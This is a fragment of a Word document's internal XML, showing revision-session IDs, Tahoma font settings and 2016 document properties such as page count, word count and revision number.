    <w:rsid w:val="00A11EA8"/>
    <w:rsid w:val="00A439E8"/>
    <w:rsid w:val="00A4680C"/>
    <w:rsid w:val="00A5001E"/>
    <w:rsid w:val="00A60AC4"/>
    <w:rsid w:val="00A74989"/>
    <w:rsid w:val="00A809CB"/>
    <w:rsid w:val="00A959CE"/>
    <w:rsid w:val="00A96CCD"/>
    <w:rsid w:val="00AB11A6"/>
    <w:rsid w:val="00AB2CE6"/>
    <w:rsid w:val="00AC090D"/>
    <w:rsid w:val="00AC2A1A"/>
    <w:rsid w:val="00AC3D2E"/>
    <w:rsid w:val="00AE217D"/>
    <w:rsid w:val="00AE280B"/>
    <w:rsid w:val="00AE4EDB"/>
    <w:rsid w:val="00AE61D9"/>
    <w:rsid w:val="00AF6EFD"/>
    <w:rsid w:val="00B20BD0"/>
    <w:rsid w:val="00B21540"/>
    <w:rsid w:val="00B23759"/>
    <w:rsid w:val="00B372CB"/>
    <w:rsid w:val="00B408C9"/>
    <w:rsid w:val="00B86D16"/>
    <w:rsid w:val="00B877EE"/>
    <w:rsid w:val="00BB5835"/>
    <w:rsid w:val="00BD1991"/>
    <w:rsid w:val="00BD2BF6"/>
    <w:rsid w:val="00BE152E"/>
    <w:rsid w:val="00BF1705"/>
    <w:rsid w:val="00C13C59"/>
    <w:rsid w:val="00C27D10"/>
    <w:rsid w:val="00C507A5"/>
    <w:rsid w:val="00C75282"/>
    <w:rsid w:val="00CB1F5D"/>
    <w:rsid w:val="00CB22A5"/>
    <w:rsid w:val="00CD63FA"/>
    <w:rsid w:val="00CF7D06"/>
    <w:rsid w:val="00D06342"/>
    <w:rsid w:val="00D143E7"/>
    <w:rsid w:val="00D224C2"/>
    <w:rsid w:val="00D41DD6"/>
    <w:rsid w:val="00D82EAA"/>
    <w:rsid w:val="00D852BD"/>
    <w:rsid w:val="00DA361E"/>
    <w:rsid w:val="00DB2B28"/>
    <w:rsid w:val="00DB5607"/>
    <w:rsid w:val="00DB7434"/>
    <w:rsid w:val="00DC1D59"/>
    <w:rsid w:val="00DC57E5"/>
    <w:rsid w:val="00DD2425"/>
    <w:rsid w:val="00DE26BC"/>
    <w:rsid w:val="00E310E0"/>
    <w:rsid w:val="00E62DA3"/>
    <w:rsid w:val="00E6402C"/>
    <w:rsid w:val="00E669BC"/>
    <w:rsid w:val="00E97CB5"/>
    <w:rsid w:val="00EB2649"/>
    <w:rsid w:val="00EB53E8"/>
    <w:rsid w:val="00EE30FE"/>
    <w:rsid w:val="00F12F2A"/>
    <w:rsid w:val="00F15ABA"/>
    <w:rsid w:val="00F26637"/>
    <w:rsid w:val="00F32F64"/>
    <w:rsid w:val="00F638F2"/>
    <w:rsid w:val="00F661BD"/>
    <w:rsid w:val="00F70001"/>
    <w:rsid w:val="00F84BB3"/>
    <w:rsid w:val="00FA6D87"/>
    <w:rsid w:val="00FC624B"/>
    <w:rsid w:val="00FF7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89DF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3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346"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi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3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346"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi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CFC088-0DE0-4796-969B-B52EC1774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6</TotalTime>
  <Pages>1</Pages>
  <Words>655</Words>
  <Characters>37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XU</dc:creator>
  <cp:lastModifiedBy>PC_Tech</cp:lastModifiedBy>
  <cp:revision>170</cp:revision>
  <cp:lastPrinted>2016-12-02T22:37:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-09-19T22:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-02T22:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>